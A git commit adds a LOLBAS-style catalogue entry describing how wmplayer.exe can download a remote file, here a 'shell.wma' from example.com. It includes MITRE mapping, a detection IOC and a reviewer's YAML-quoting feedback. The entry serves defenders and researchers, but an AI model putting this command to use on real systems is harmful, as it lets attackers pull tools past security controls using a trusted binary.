Added technique using wmplayer.exe

pampuna 2024-12-14 12:15:46 +00:00
parent baaa5bbc73
commit f8e6e4755f


@ -0,0 +1,26 @@
---
Name: Wmplayer.exe
Description: Windows Media Player
Author: 'Rutger Flohil'
Created: 2024-12-14
Commands:
- Command: & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "http://example.com/shell.wma"
Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Windows Media Player\wmplayer.exe
- Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Code_Sample:
- Code: https://pampuna.nl/blog/2024/12/wmplayer.html
Detection:
- IOC: Network connections originating from wmplayer.exe may be suspicious
Resources:
- Link: https://pampuna.nl/blog/2024/12/wmplayer.html
- Person: Rutger Flohil
Handle: ''
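
Review bot: The `Command` value under `Commands` starts with a bare `&`, which YAML reads as an anchor indicator, so the unquoted value is not loaded as a plain string. Wrap the whole value in single quotes, which also keeps the backslashes and inner double quotes literal: `- Command: '& "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "http://example.com/shell.wma"'`. Separately, `Detection` lists only the network IOC, while the Description states that the download is stored in INetCache; adding an IOC for wmplayer.exe being started with a URL argument, or for files written to INetCache by wmplayer.exe, would give defenders a second signal. The phrase "needs to be cleaned before use" in the Description is ambiguous about what is cleaned and should be reworded, and the empty `Handle: ''` can be dropped if no handle is given.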